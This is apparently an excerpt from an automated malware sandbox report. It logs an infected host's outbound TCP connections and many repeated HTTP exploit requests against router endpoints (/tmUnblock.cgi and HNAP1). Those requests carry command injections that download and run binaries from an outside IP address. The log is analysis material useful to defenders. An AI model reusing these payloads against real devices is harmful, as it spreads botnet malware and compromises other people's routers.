          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.73.196.68:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.77.226.236:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.169.128.254:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.173.123.86:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.230.124.50:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.140.128.50:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.94.115.122:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.223.183.23:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.213.111.145:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.254.230.102:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.31.48.15:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.135.74.79:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.162.51.239:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.0.155.221:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.67.97.85:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.150.85.207:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.183.72.85:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.157.67.223:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.130.203.68:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.1.1.44:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.236.121.132:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.218.180.145:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.246.140.61:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.95.206.46:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.27.175.84:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.128.195.151:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.89.211.230:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.134.215.184:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.87.123.98:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.111.233.158:8080
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 